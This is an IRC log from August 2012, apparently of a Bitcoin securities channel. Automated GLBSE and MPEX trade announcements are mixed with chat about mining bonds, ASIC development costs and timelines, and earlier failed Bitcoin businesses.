general cdos are based on fixed rate investments, which arguably mpoe bonds aren't, or at least eskimobob so argues. Aug 15 02:27:13 oooh, i see some nifty bonds Aug 15 02:27:19 o hai. Aug 15 02:27:37 yes, there is a lurking starfish Aug 15 02:28:10 [GLBSE] [DMC] 40 @ 0.05 = 2 BTC [+] Aug 15 02:28:20 [GLBSE] [TYGRR.BOND-P] 3 @ 0.9999 = 2.9997 BTC [+] Aug 15 02:28:56 patrickharnett so i guess this has the side advantage to you that you know when you'll be asked to repay : 30th of october or thereabouts. Aug 15 02:29:02 [GLBSE] [DMC] 1 @ 0.05 BTC [+] Aug 15 02:29:34 I didn't notice the 30'th date - wouldn't be a problem anyway Aug 15 02:29:47 [MPEX] [S.MPOE] 32810 @ 0.000383 = 12.5662 BTC [+] Aug 15 02:29:48 well since the bonds die and repay on the 1st of nov Aug 15 02:29:49 [MPEX] [S.MPOE] 18714 @ 0.00038423 = 7.1905 BTC [+] Aug 15 02:29:50 [MPEX] [S.MPOE] 797 @ 0.00039267 = 0.313 BTC [+] Aug 15 02:29:51 [MPEX] [S.MPOE] 5615 @ 0.00039477 = 2.2166 BTC [+] Aug 15 02:29:52 it'd be a few days prior. Aug 15 02:30:09 it's only 500+interest, it's not lots Aug 15 02:30:11 [GLBSE] [GIGAMINING] 1 @ 1.1375 BTC [+] Aug 15 02:30:22 not this time. Aug 15 02:30:32 if these are successfull any i will make larger ones. Aug 15 02:31:03 ciuciu: you're really hung up on that, arn't you? Aug 15 02:31:16 [MPEX] [B.MPCD.A] 120000 @ 0.001 = 120 BTC Aug 15 02:31:35 oh, i didn't realize that Aug 15 02:33:16 [GLBSE] [BDT] 3 @ 1.0201 = 3.0603 BTC [-] Aug 15 02:34:24 [GLBSE] [TYGRR.BOND-P] 1 @ 0.9999 BTC [+] Aug 15 02:34:37 [GLBSE] [TYGRR.BOND-PI] 1 @ 1.539 BTC [-] Aug 15 02:35:00 [GLBSE] [BDT] 5 @ 1.02 = 5.1 BTC [-] Aug 15 02:35:02 [GLBSE] [BDT] 10 @ 1.011 = 10.11 BTC [-] Aug 15 02:35:15 [GLBSE] [DMC] 4 @ 0.05 = 0.2 BTC [+] wait a second. didn;t that start at 1.0 !? Aug 15 02:35:34 MoneyIsDebt who's JAH ? Aug 15 02:36:00 [GLBSE] [GMVT-BOT] 4 @ 0.0999 = 0.3996 BTC [-] Aug 15 02:36:09 [GLBSE] [BDK.BND] 3 @ 0.10274699 = 0.3082 BTC [-] Aug 15 02:37:23 [GLBSE] [GIGAMINING] 5 @ 1.135 = 5.675 BTC [-] Aug 15 02:38:12 Go with Kluge :) Aug 15 02:38:19 that's what I did, nice guy and very trustable Aug 15 02:38:21 Mining bond. Pays daily, always at exact time. Skipped once only - today. But it was explained on the forum Aug 15 02:38:45 a ok Aug 15 02:39:09 [GLBSE] [GIGAMINING] 2 @ 1.13849 = 2.277 BTC [+] Aug 15 02:39:15 didn't kludge get burned a yet undisclosed ammt over the owens/zip/rebate fiasco recently ? Aug 15 02:41:16 [GLBSE] [TYGRR.BOND-P] 1 @ 1 BTC [+] Aug 15 02:47:11 [GLBSE] [DMC] 16 @ 0.05 = 0.8 BTC [+] Aug 15 02:47:31 [GLBSE] [DMC] 1 @ 0.05 BTC [+] Aug 15 02:50:49 [GLBSE] [GIGAMINING] 1 @ 1.125 BTC [-] Aug 15 02:50:50 [GLBSE] [GIGAMINING] 2 @ 1.08909 = 2.1782 BTC [-] Aug 15 02:51:02 [GLBSE] [GIPPT] 3 @ 1.13 = 3.39 BTC [+] Aug 15 02:51:04 [GLBSE] [GIPPT] 9 @ 1.195 = 10.755 BTC [+] Aug 15 02:51:05 [GLBSE] [GIPPT] 12 @ 1.2 = 14.4 BTC [+] Aug 15 02:51:33 [GLBSE] [TYGRR.BOND-P] 4 @ 0.9901 = 3.9604 BTC [-] Aug 15 02:51:35 [GLBSE] [TYGRR.BOND-P] 2 @ 0.99 = 1.98 BTC [-] Aug 15 02:51:36 [GLBSE] [TYGRR.BOND-P] 4 @ 0.99 = 3.96 BTC [-] Aug 15 02:51:37 [GLBSE] [TYGRR.BOND-P] 12 @ 0.98 = 11.76 BTC [-] Aug 15 02:52:25 [GLBSE] [BTC-MINING] 3 @ 0.861 = 2.583 BTC [-] Aug 15 02:53:32 [MPEX] [S.MPOE] 15500 @ 0.00037473 = 5.8083 BTC [-] Aug 15 02:53:33 [MPEX] [S.MPOE] 3278 @ 0.00036172 = 1.1857 BTC [-] Aug 15 02:53:34 [MPEX] [S.MPOE] 9469 @ 0.0003552 = 3.3634 BTC [-] Aug 15 02:53:35 [MPEX] [S.MPOE] 6453 @ 0.00034738 = 2.2416 BTC [-] Aug 15 02:54:42 [GLBSE] [BTCS] 3 @ 0.00965 = 0.029 BTC [-] Aug 15 02:54:44 [GLBSE] [BTCS] 47 @ 0.0095 = 0.4465 BTC [-] Aug 15 02:57:14 [GLBSE] [ASICMINER] 25 @ 0.19999 = 4.9998 BTC [+] Aug 15 02:57:19 [MPEX] [S.MPOE] 21524 @ 0.00039477 = 8.497 BTC [+] Aug 15 02:57:20 [MPEX] [S.MPOE] 18114 @ 0.00039502 = 7.1554 BTC [+] Aug 15 02:59:42 I think a lot of us learnt from the whole JRO mess, At least I know that I learnt a lot. Aug 15 03:00:00 I have actually added a couple of rules to my investment rules book ^^ to prevent it happening again Aug 15 03:00:00 [GLBSE] [YARR] 2 @ 1.39 = 2.78 BTC [-] Aug 15 03:00:10 are they public? Aug 15 03:02:11 [GLBSE] [TYGRR.BOND-P] 38 @ 0.98 = 37.24 BTC [-] Aug 15 03:02:13 [GLBSE] [TYGRR.BOND-P] 4 @ 0.9719 = 3.8876 BTC [-] Aug 15 03:02:14 [GLBSE] [TYGRR.BOND-P] 18 @ 0.971 = 17.478 BTC [-] Aug 15 03:10:12 [GLBSE] [JAH] 1 @ 0.159899 BTC [+] Aug 15 03:11:04 [GLBSE] [UDN] 1 @ 0.092 BTC [+] Aug 15 03:11:37 [MPEX] [F.GIGA.ETF] 137 @ 0.00112262 = 0.1538 BTC [+] Aug 15 03:11:38 [MPEX] [F.GIGA.ETF] 2063 @ 0.00112821 = 2.3275 BTC [+] Aug 15 03:11:44 [GLBSE] [CPA] 1 @ 0.1028 BTC [+] Aug 15 03:13:30 [GLBSE] [BMMO] 1 @ 0.08999999 BTC [+] Aug 15 03:16:09 Anyone want to buy ASICMINER shares? ^^ Aug 15 03:16:21 [GLBSE] [JTME] 1 @ 0.99898 BTC [-] Aug 15 03:20:35 [MPEX] [O.BTCUSD.P130T] 3 @ 0.20079244 = 0.6024 BTC [-] Aug 15 03:20:36 [MPEX] [O.BTCUSD.P100N] 1 @ 0.16948855 BTC [-] Aug 15 03:22:58 Good night guys! if anyone want anything pm/email me and I will answer asap Aug 15 03:28:58 [MPEX] [B.MPCD.C] 17500 @ 0.001 = 17.5 BTC Aug 15 03:44:28 [GLBSE] [TYGRR.BOND-P] 1 @ 0.9999 BTC [+] Aug 15 03:44:52 damnit Aug 15 03:44:55 deadterra left Aug 15 03:48:38 [GLBSE] [ASICMINER] 1 @ 0.11 BTC [-] Aug 15 03:48:59 [GLBSE] [GIGAMINING] 4 @ 1.08520001 = 4.3408 BTC [-] Aug 15 03:49:01 [GLBSE] [GIGAMINING] 70 @ 1.08510001 = 75.957 BTC [-] Aug 15 03:49:02 [GLBSE] [GIGAMINING] 10 @ 1.0851 = 10.851 BTC [-] Aug 15 03:49:03 [GLBSE] [GIGAMINING] 2 @ 1.08000001 = 2.16 BTC [-] Aug 15 03:49:05 [GLBSE] [GIGAMINING] 100 @ 1.07 = 107 BTC [-] Aug 15 03:49:06 [GLBSE] [GIGAMINING] 5 @ 1.0625 = 5.3125 BTC [-] Aug 15 03:49:07 [GLBSE] [GIGAMINING] 1 @ 1.050001 BTC [-] Aug 15 03:49:07 [GLBSE] [GIGAMINING] 1 @ 1.05 BTC [-] Aug 15 03:49:08 [GLBSE] [GIGAMINING] 3 @ 1.05 = 3.15 BTC [-] Aug 15 03:49:09 [GLBSE] [GIGAMINING] 3 @ 1.01200011 = 3.036 BTC [-] Aug 15 03:49:11 [GLBSE] [GIGAMINING] 7 @ 1.012 = 7.084 BTC [-] Aug 15 03:49:12 [GLBSE] [GIGAMINING] 2 @ 1 = 2 BTC [-] Aug 15 03:52:31 mk so i have 8 confirms, i click check deposit in glbse and nothing happens Aug 15 03:52:33 is this customary ? Aug 15 03:53:52 no,click it again Aug 15 03:54:26 [MPEX] [S.MPOE] 13700 @ 0.00038279 = 5.2442 BTC [-] Aug 15 03:55:32 nothing ;/ Aug 15 03:56:43 [GLBSE] [OBSI.HRPT] 10 @ 0.10455 = 1.0455 BTC [-] Aug 15 03:57:03 that happens sometimes Aug 15 03:57:18 [GLBSE] [FPGAMINING] 1 @ 0.94 BTC [-] Aug 15 03:57:20 [GLBSE] [FPGAMINING] 3 @ 0.945 = 2.835 BTC [+] Aug 15 03:57:21 [GLBSE] [FPGAMINING] 1 @ 0.95 BTC [+] Aug 15 03:57:32 how long does it ususally take to resolve Obsi ? Aug 15 03:57:40 if you click it incessantly until the deposit shows up it helps to make you feel productive Aug 15 03:57:55 not long usually 10 mins or so Aug 15 03:58:04 its been maybe half hour Aug 15 03:58:09 I haven't had it take longer than 6 confirms eprsonally. Aug 15 03:58:45 I've had it not show after 7-8 confirms, then show up on the next one after I clicked the check for deposit button Aug 15 03:59:07 [MPEX] [B.MPCD.C] 100000 @ 0.001 = 100 BTC Aug 15 03:59:13 well im at 11 confirms already Aug 15 03:59:24 aha Aug 15 03:59:26 ok that did it Aug 15 03:59:28 wow, never had it go that far Aug 15 03:59:30 [GLBSE] [TYGRR.BOND-P] 1 @ 0.99989999 BTC [-] Aug 15 03:59:54 [GLBSE] [TYGRR.BOND-PI] 1 @ 1.539 BTC [-] Aug 15 03:59:57 lets make usagi happy nao. Aug 15 04:00:08 [GLBSE] [NYAN.A] 100 @ 1 = 100 BTC [-] Aug 15 04:02:44 [GLBSE] [YARR] 1 @ 1.32 BTC [-] Aug 15 04:05:40 [MPEX] [S.MPOE] 7186 @ 0.00039502 = 2.8386 BTC [+] Aug 15 04:05:41 [MPEX] [S.MPOE] 6214 @ 0.0003965 = 2.4639 BTC [+] Aug 15 04:06:27 [GLBSE] [DMC] 27 @ 0.05 = 1.35 BTC [+] Aug 15 04:06:48 [GLBSE] [DMC] 1 @ 0.05 BTC [+] Aug 15 04:06:57 [GLBSE] [TYGRR.BOND-P] 1 @ 0.99989999 BTC [-] Aug 15 04:09:34 [GLBSE] [NYAN.A] 5 @ 1 = 5 BTC [-] Aug 15 04:10:13 [GLBSE] [OBSI.1MHS] 21 @ 0.07654 = 1.6073 BTC [+] Aug 15 04:19:15 [GLBSE] [OBSI.HRPT] 20 @ 0.10459 = 2.0918 BTC [+] Aug 15 04:19:25 [GLBSE] [BDK.BND] 21 @ 0.10274699 = 2.1577 BTC [-] Aug 15 04:19:26 [GLBSE] [BDK.BND] 17 @ 0.102747 = 1.7467 BTC [+] Aug 15 04:20:18 [GLBSE] [FPGA.CONTRACT] 1 @ 0.167 BTC [+] Aug 15 04:21:03 [GLBSE] [OBSI.HRPT] 3 @ 0.10459 = 0.3138 BTC [+] Aug 15 04:22:11 [GLBSE] [FPGA.CONTRACT] 3 @ 0.16789 = 0.5037 BTC [+] Aug 15 04:25:36 [GLBSE] [GIGAMINING] 50 @ 0.99 = 49.5 BTC [-] **** BEGIN LOGGING AT Wed Aug 15 11:01:59 2012 Aug 15 11:02:20 hmm interesting Aug 15 11:02:26 btc-mining would be 1:9 DMC Aug 15 11:02:28 smickles no, i just don't patronize places where idiots like gmaxwell are allowed to run wild. Aug 15 11:03:28 thats at the new 15mh/share trade rate Aug 15 11:04:48 370/15 = 9. Aug 15 11:05:05 you are slowly killing your company Diablo + a lot of other GLBSE assets too, since your stupid asicminer swap Aug 15 11:05:17 U mad bro? Aug 15 11:05:18 what's the story here ? Aug 15 11:05:22 dmc share worth NOTHING Aug 15 11:05:24 U jelly? Aug 15 11:05:39 PsychoticBoy: if you say so Aug 15 11:05:47 ok 0.05 is not nothing but also not the 1 btc you started with Aug 15 11:05:55 ah, Diablo keeps changing the rate at which he accepts shares Aug 15 11:05:59 you know Aug 15 11:06:03 it's really hard to speak Aug 15 11:06:04 why ? Aug 15 11:06:06 with a dick in your mouth Aug 15 11:06:10 lol Aug 15 11:06:12 As usual, only considers hashing for trading, not BTC price Aug 15 11:06:16 no nefario we didn't know that :D Aug 15 11:06:28 your timing was perfect Aug 15 11:07:47 I am sooooo sorry for the people who bought your share at 1 btc :( Aug 15 11:08:08 Well look at BMF, we bought YABMC at 0.30 (or was it 0.40) Aug 15 11:08:09 knowing now its worth not a thing Aug 15 11:08:14 is this a case of miners not understanding finance ? Aug 15 11:08:20 Mining bonds are inherrently a bad investment Aug 15 11:08:25 Yeah pretty much mircea Aug 15 11:08:39 thats the market that killed yabmc, diablo is killing dmc Aug 15 11:09:11 You can buy mining bonds at 0.1/mhash now, do you know why? Aug 15 11:09:19 cause they're worth about that ? Aug 15 11:09:28 Nope Aug 15 11:09:30 because of OBSI.1MHS. Aug 15 11:09:34 Selling out at 0.1 Aug 15 11:09:37 ... Aug 15 11:09:44 because everybody thinks asics are comes. MARK MY WORDS: NO asics before 2013 Aug 15 11:09:57 PsychoticBoy that may very well be true actually. Aug 15 11:10:03 End of 2012, 2013, 2014 Aug 15 11:10:04 Now, step 2 beyond obsi, is asicminer Aug 15 11:10:10 All seems very soon to me Aug 15 11:10:15 asicminer is selling mhash for less than 0.01/mhash Aug 15 11:10:24 You can either capitalize on that or die Aug 15 11:10:26 i think few people comprehend the intricacies of getting a foundry to do a run. Aug 15 11:10:32 asicminer will not develop any asics before 2013 either Aug 15 11:10:42 this "can do" attitude has gotten people in a ridiculous position. Aug 15 11:10:49 There are multiple companies with 2012 release dates Aug 15 11:11:01 doing an asic run is actually of the complexity level of releasing a blockbuster movie. Aug 15 11:11:11 yep BFL will not meet their requirements Aug 15 11:11:27 also asicminer wont finish before 2013 Aug 15 11:11:42 You are all assuming BFL had not started/worked on this privately long before announcing the ASICs Aug 15 11:11:54 BTC-Mining bfl has not the money to do this. Aug 15 11:12:09 uhhh BFL always fuks up their costumers Aug 15 11:12:28 You can't even know that, technically Aug 15 11:12:29 an asic run is in the 50-100mn range as the absolut minimum. they don't have 50 mn. Aug 15 11:12:33 Lots of VC is moving into bitcoin now, I am willing to bet there's at least one secret competitor Aug 15 11:12:36 yes, i can know how much money any company has. Aug 15 11:12:41 this is why i'm paid to do consulting. Aug 15 11:12:43 irl. Aug 15 11:12:51 What about 130nm? Aug 15 11:13:01 ASICMINER is 130 isn't it? Aug 15 11:13:07 ssh usagi. Aug 15 11:13:13 let the trolls have their fun Aug 15 11:13:27 what 130nm ? im talking millions us$. Aug 15 11:13:31 Well mircea I am doing an interview with friedcat right now Aug 15 11:13:39 That's impossible mircea, except for publicly traded companies who have public financial statements Aug 15 11:13:40 Do you have any questions for him? Aug 15 11:13:52 i don't right off know who that is Aug 15 11:14:00 =| Aug 15 11:14:03 friedcat = ASICMINER Aug 15 11:14:03 BTC-Mining not really impossible. sometimes difficult. Aug 15 11:14:15 o o. i don't think so, not atm. Aug 15 11:14:20 Mircea you seem a little out of touch with the market these days, no offense Aug 15 11:14:31 i don't see what the offense'd be. Aug 15 11:14:46 Well you run an exchange I guess your busy hehe Aug 15 11:15:05 [GLBSE] [ASICMINER] 1 @ 0.17 BTC [+] Aug 15 11:15:06 im not too busy to know the semiconductor trade, but anyway. Aug 15 11:17:43 I'm under the impression you could go to any of 50 companies with a design and have them print it Aug 15 11:17:57 They have a design Aug 15 11:18:15 It's actually not that difficult, just a lot of sha cores right Aug 15 11:18:42 like 50 or 100 i imagine, on a chip Aug 15 11:18:47 no idea really Aug 15 11:19:25 you're under a wrong impression. Aug 15 11:19:32 what you describe is true of fpgas Aug 15 11:19:41 which are specifically made to exist as prototyping units. Aug 15 11:19:59 asics are large and expensive runs. just the set-up cost for the foundry to do an asic run can be 10mn. Aug 15 11:20:12 and i never heard of foundry runs for less than millions of units. Aug 15 11:20:21 I have Aug 15 11:20:23 sony regularly does billion-dollar runs Aug 15 11:20:24 its not uncommon. Aug 15 11:20:48 Diablo-D3 there are some cheaper variants to set up that deliver dubious product, as in, the economies of scale don't get to play much Aug 15 11:20:51 I see a lot of small companies around 10-100 million that do small runs Aug 15 11:20:55 and you can end up with significant bad chip rates. Aug 15 11:21:20 eSillicon signed apple when they only had a market cap of like 75 million Aug 15 11:21:22 to cut this entire story short : i think any of the btc companies are well meaning, and i think asics will eventually come Aug 15 11:21:22 its hard to get a bad chip rate on 130nm nowadays Aug 15 11:21:28 especially with pre-existing IP. Aug 15 11:21:31 i do not believe any of them has the wherewithal to pull it off this year. Aug 15 11:21:47 Diablo-D3 these are all new designs really. Aug 15 11:21:57 we don't know jack shit of the resonances etc. Aug 15 11:22:15 they're not as new as you think they are. Aug 15 11:22:42 are you telling me any of the asic proposing companies actually BOUGHT an already ran design ? Aug 15 11:22:56 Im not telling you anything. Aug 15 11:23:00 What I am doing is going to bed Aug 15 11:23:01 night all Aug 15 11:23:03 nn. Aug 15 11:23:49 usagi : a. esillicon does not own or run foundries, they mostly manage other people's runs b. bfl has no 75 mn mkt cap. Aug 15 11:24:48 Yes, they are fabless hehe Aug 15 11:25:11 The thing is this isn't 23nm Aug 15 11:25:13 it's 130 Aug 15 11:25:32 to put it in perspective : we're discussing the efficient moving of coal, and somebody proposes they will do it by car and shows that their cousin who is a cab driver drives a cab on a yearly budget of 10k. Aug 15 11:25:35 sure. however... Aug 15 11:25:37 I have exact cost numbers for you Aug 15 11:25:45 But you will have to wait until the interview. Aug 15 11:25:54 usagi : yes, ideally they could get lucky and catch some production hole or something Aug 15 11:26:05 this'd mean an insider or two being on the board and helping out. Aug 15 11:26:06 wink wink Aug 15 11:26:24 One of the major shifts we have seen in the last several months Aug 15 11:26:34 is that bitcoin based busiesses are no longer one man shows. Aug 15 11:26:43 understand : these are high risk propositions, the ideea we'll get rich because we're sparrows and find a crumb some ogre lefrt behind. Aug 15 11:26:47 The most successful ones are all multiperson now Aug 15 11:26:49 maybe we get the crumb, maybe we get the club. Aug 15 11:26:56 Yep Aug 15 11:27:04 mpex was multiperson since day one. Aug 15 11:27:15 that bitcoin consultancy disaster has been multiperson for abnout as long Aug 15 11:27:26 Thats why I have only invested about 2-3% into asicminer Aug 15 11:28:50 That being said it's my top holding Aug 15 11:31:21 Bitcoin consultancy, JRO? Aug 15 11:31:23 or is that bitcoinina Aug 15 11:31:30 I've lost track of all the failures Aug 15 11:31:50 All of those failures are because one person had too much control over a business Aug 15 11:32:01 For example the JRO stuff. Why was there no treasurer? Aug 15 11:32:26 You can't seriously run a business without a treasurer or a dead man's switch nowadays Aug 15 11:32:28 bitcoin consultancy was bitcoinica/intersango and i guess glsbe Aug 15 11:32:35 or they've separated now or i dunno Aug 15 11:32:54 What we should do is make a list of questions, designed to expose the failures of the past, Aug 15 11:33:14 this would be a worthy ideea. Aug 15 11:33:16 Hmm, and use that list somehow Aug 15 11:33:46 Just simple innocuous questions Aug 15 11:34:06 like, how many employees does your company have Aug 15 11:34:20 (If the answer is zero, it's not much of a business is it) Aug 15 11:34:36 maybe it is. most miners seem to be loners. Aug 15 11:34:41 does gigavps have employees ? Aug 15 11:34:45 I actually employ four people (i.e. pay them) although they're all part time :< Aug 15 11:35:14 He must have someone to do something with that many GPUs Aug 15 11:35:27 But it raises the issue, do we really need another 5ghs miner startup Aug 15 11:35:47 Gigamining has a huge market cap so it's a little different they can buy their way in, but if I were to buy a single and start a company Aug 15 11:35:54 Hmmm, maybe thats not a good idea anymore. Aug 15 11:36:34 Giga has two farms right? Aug 15 11:37:01 if not three Aug 15 11:40:32 [MPEX] [O.BTCUSD.P120T] 2 @ 0.13105082 = 0.2621 BTC [-] Aug 15 11:44:18 [GLBSE] [BIB.PIRATE] 1 @ 1.0049 BTC [-] Aug 15 11:45:35 [GLBSE] [MOVETO.FUND] 1 @ 1.14999999 BTC [+] Aug 15 11:46:12 [GLBSE] [CPA] 20 @ 0.1028 = 2.056 BTC [+] Aug 15 11:47:00 [GLBSE] [BMF] 1 @ 0.7 BTC [-] Aug 15 11:47:03 [GLBSE] [TYGRR.BOND-P] 2 @ 1 = 2 BTC [+] Aug 15 11:53:36 [GLBSE] [DMC] 100 @ 0.035001 = 3.5001 BTC [-] Aug 15 11:53:37 [GLBSE] [DMC] 200 @ 0.035 = 7 BTC [-] Aug 15 11:56:23 [GLBSE] [TYGRR.BOND-P] 4 @ 1 = 4 BTC [+] Aug 15 11:56:49 [GLBSE] [TYGRR.BOND-A] 1 @ 0.153 BTC [-] Aug 15 11:59:24 [GLBSE] [BITCOINMINV] 23 @ 0.1199 = 2.7577 BTC [-] Aug 15 11:59:25 [GLBSE] [BITCOINMINV] 20 @ 0.12 = 2.4 BTC [+] Aug 15 11:59:36 [MPEX] [S.MPOE] 4300 @ 0.0003965 = 1.705 BTC [+] Aug 15 12:00:03 [GLBSE] [BITCOINMINV] 43 @ 0.121 = 5.203 BTC [+] Aug 15 12:02:40 [MPEX] [S.MPOE] 27400 @ 0.0003965 = 10.8641 BTC [+] Aug 15 12:03:36 [GLBSE] [TYGRR.BOND-B] 46 @ 0.1 = 4.6 BTC [-] Aug 15 12:25:18 [MPEX] [S.MPOE] 23494 @ 0.00039172 = 9.2031 BTC [-] Aug 15 12:25:19 [MPEX] [S.MPOE] 12206 @ 0.00038892 = 4.7472 BTC [-] Aug 15 12:31:57 [GLBSE] [ASICMINER] 65 @ 0.11 = 7.15 BTC [-] Aug 15 12:32:19 Still selling ASICMINER Aug 15 12:36:19 [GLBSE] [MERGEDMINING] 4 @ 0.08 = 0.32 BTC [+] Aug 15 12:36:54 [GLBSE] [RSM] 2 @ 0.26 = 0.52 BTC [-] Aug 15 12:45:16 [GLBSE] [TYGRR.BOND-P] 4 @ 0.9901 = 3.9604 BTC [-] Aug 15 12:45:17 [GLBSE] [TYGRR.BOND-P] 5 @ 0.99 = 4.95 BTC [-] Aug 15 12:45:18 [GLBSE] [TYGRR.BOND-P] 7 @ 0.985 = 6.895 BTC [-] Aug 15 12:45:19 [GLBSE] [TYGRR.BOND-P] 1 @ 0.98112012 BTC [-] Aug 15 12:45:21 [GLBSE] [TYGRR.BOND-P] 3 @ 0.98112 = 2.9434 BTC [-] Aug 15 12:45:22 [GLBSE] [TYGRR.BOND-P] 4 @ 0.98101 = 3.924 BTC [-] Aug 15 12:45:23 [GLBSE] [TYGRR.BOND-P] 17 @ 0.981 = 16.677 BTC [-] Aug 15 12:45:24 [GLBSE] [TYGRR.BOND-P] 13 @ 0.981 = 12.753 BTC [-] Aug 15 12:45:25 [GLBSE] [TYGRR.BOND-P] 2 @ 0.98 = 1.96 BTC [-] Aug 15 12:45:26 [GLBSE] [TYGRR.BOND-P] 1 @ 0.971 BTC [-] Aug 15 12:45:27 [GLBSE] [TYGRR.BOND-P] 45 @ 0.97 = 43.65 BTC [-] Aug 15 12:47:42 [GLBSE] [TYGRR.BOND-P] 15 @ 0.97 = 14.55 BTC [-] Aug 15 12:49:47 [GLBSE] [YABMC] 15 @ 0.1171 = 1.7565 BTC [+] Aug 15 12:52:01 [GLBSE] [FOO.PPPPT] 2 @ 1.0101 = 2.0202 BTC [-] Aug 15 12:52:02 [GLBSE] [FOO.PPPPT] 5 @ 1.01 = 5.05 BTC [-] Aug 15 12:52:04 [GLBSE] [FOO.PPPPT] 1 @ 1.0025 BTC [-] Aug 15 12:52:04 [GLBSE] [FOO.PPPPT] 39 @ 1.002 = 39.078 BTC [-] Aug 15 12:52:05 [GLBSE] [FOO.PPPPT] 5 @ 1.0002 = 5.001 BTC [-] Aug 15 12:52:06 [GLBSE] [FOO.PPPPT] 25 @ 1.0001 = 25.0025 BTC [-] Aug 15 12:52:08 [GLBSE] [FOO.PPPPT] 123 @ 1 = 123 BTC [-] Aug 15 12:53:00 [MPEX] [S.MPOE] 50200 @ 0.0003965 = 19.9043 BTC [+] Aug 15 12:56:05 why are people panicing so much xD Aug 15 12:56:24 so sell of a bond that's worth 1 BTC for less just due to a interest decrease is crazy :P Aug 15 12:59:42 speculation is speculation. Aug 15 12:59:53 [GLBSE] [YABMC] 20 @ 0.1199 = 2.398 BTC [+] Aug 15 13:00:19 [GLBSE] [PUREMINING] 1 @ 0.15 BTC [+] Aug 15 13:01:12 [MPEX] [F.GIGA.ETF] 6600 @ 0.00108634 = 7.1698 BTC [+] Aug 15 13:02:34 [MPEX] [S.MPOE] 4435 @ 0.0003965 = 1.7585 BTC [+] Aug 15 13:07:34 [MPEX] [O.HASH.C10TH] 150000 @ 0.00017429 = 26.1435 BTC [-] Aug 15 13:08:06 I guess people are thinking pirate will default soon in which case they would be useless. Aug 15 13:08:10 which I guess might be the case Aug 15 13:09:47 [MPEX] [F.GIGA.ETF] 2500 @ 0.00111592 = 2.7898 BTC [+] Aug 15 13:09:48 [MPEX] [F.GIGA.ETF] 176 @ 0.00112697 = 0.1983 BTC [+] Aug 15 13:17:35 [GLBSE] [TYGRR.BOND-P] 3 @ 0.955 = 2.865 BTC [-] Aug 15 13:17:36 [GLBSE] [TYGRR.BOND-P] 4 @ 0.9505 = 3.802 BTC [-] Aug 15 13:17:38 [GLBSE] [TYGRR.BOND-P] 76 @ 0.95 = 72.2 BTC [-] Aug 15 13:18:07 [GLBSE] [ASICMINER] 200 @ 0.108 = 21.6 BTC [-] Aug 15 13:18:09 [GLBSE] [ASICMINER] 200 @ 0.107 = 21.4 BTC [-] Aug 15 13:18:57 [MPEX] [F.GIGA.ETF] 2824 @ 0.00112697 = 3.1826 BTC [+] Aug 15 13:18:59 [MPEX] [F.GIGA.ETF] 1331 @ 0.00112821 = 1.5016 BTC [+] Aug 15 13:20:14 [GLBSE] [BIB.PIRATE] 3 @ 0.9751 = 2.9253 BTC [-] Aug 15 13:20:15 [GLBSE] [BIB.PIRATE] 100 @ 0.975 = 97.5 BTC [-] Aug 15 13:20:16 [GLBSE] [BIB.PIRATE] 7 @ 0.97000004 = 6.79 BTC [-] Aug 15 13:20:17 [GLBSE] [BIB.PIRATE] 3 @ 0.97000002 = 2.91 BTC [-] Aug 15 13:20:19 [GLBSE] [BIB.PIRATE] 13 @ 0.97 = 12.61 BTC [-] Aug 15 13:20:20 [GLBSE] [BIB.PIRATE] 2 @ 0.97 = 1.94 BTC [-] Aug 15 13:23:10 [GLBSE] [OBSI.HRPT] 7 @ 0.104599 = 0.7322 BTC [+] Aug 15 13:23:12 [GLBSE] [BIF.BTCST.PPT] 4 @ 1.025 = 4.1 BTC [+] Aug 15 13:25:03 [MPEX] [O.HASH.C10TH] 150000 @ 0.000775 = 116.25 BTC [+] Aug 15 13:32:03 [MPEX] [B.MPCD.A] 15000 @ 0.001 = 15 BTC Aug 15 13:37:47 [GLBSE] [BIB.PIRATE] 2 @ 0.9999 = 1.9998 BTC [+] Aug 15 13:38:42 [MPEX] [B.MPCD.C] 7777 @ 0.001 = 7.777 BTC Aug 15 13:42:28 [MPEX] [B.MPCD.B] 60000 @ 0.001 = 60 BTC Aug 15 13:56:26 [GLBSE] [FPGAMINING] 2 @ 0.92 = 1.84 BTC [-] Aug 15 13:57:49 [GLBSE] [YABMC] 1 @ 0.1199 BTC [+] Aug 15 14:01:23 [GLBSE] [PAJKA.BOND] 5 @ 0.05 = 0.25 BTC [-] Aug 15 14:06:36 [MPEX] [S.MPOE] 52200 @ 0.00039449 = 20.5924 BTC [-] Aug 15 14:09:01 [GLBSE] [ASICMINER] 300 @ 0.105 = 31.5 BTC [-] Aug 15 14:10:30 [MPEX] [F.GIGA.ETF] 2532 @ 0.00112821 = 2.8566 BTC [+] Aug 15 14:10:31 [MPEX] [F.GIGA.ETF] 2585 @ 0.00113235 = 2.9271 BTC [+] Aug 15 14:14:17 [GLBSE] [FPGAMINING] 2 @ 0.92 = 1.84 BTC [-] Aug 15 14:24:48 [GLBSE] [BITBOND] 6 @ 0.4255 = 2.553 BTC [-] Aug 15 14:28:00 [MPEX] [S.MPOE] 12451 @ 0.00038892 = 4.8424 BTC [-] Aug 15 14:28:01 [MPEX] [S.MPOE] 4817 @ 0.0003874 = 1.8661 BTC [-] Aug 15 14:31:15 [GLBSE] [YABMC] 15 @ 0.1171 = 1.7565 BTC [-] Aug 15 14:31:17 [GLBSE] [YABMC] 5 @ 0.117 = 0.585 BTC [-] Aug 15 14:43:22 [MPEX] [O.HASH.C10TH] 150000 @ 0.0001716 = 25.74 BTC [-] Aug 15 14:44:09 [MPEX] [S.MPOE] 2500 @ 0.00039449 = 0.9862 BTC [+] Aug 15 14:44:11 [MPEX] [S.MPOE] 1900 @ 0.0003965 = 0.7534 BTC [+] Aug 15 14:45:03 whoa going to 12.5 Aug 15 14:53:30 ;;ticker Aug 15 14:53:30 Best bid: 12.405, Best ask: 12.44999, Bid-ask spread: 0.04499, Last trade: 12.44999, 24 hour volume: 46501, 24 hour low: 11.925, 24 hour high: 12.4799 Aug 15 14:55:40 [GLBSE] [PUREASIC] 3 @ 0.7 = 2.1 BTC [+] Aug 15 14:56:33 [MPEX] [F.GIGA.ETF] 5900 @ 0.00111945 = 6.6048 BTC [-] Aug 15 15:02:56 [GLBSE] [OBSI.1MHS] 1 @ 0.075 BTC [-] Aug 15 15:03:59 [MPEX] [S.MPOE] 59504 @ 0.0003965 = 23.5933 BTC [+] Aug 15 15:06:01 [GLBSE] [ASICMINER] 400 @ 0.105 = 42 BTC [-] Aug 15 15:12:46 [GLBSE] [TYGRR.BOND-P] 4 @ 0.9531001 = 3.8124 BTC [+] Aug 15 15:13:12 [MPEX] [S.BVPS] 88 @ 0.003828 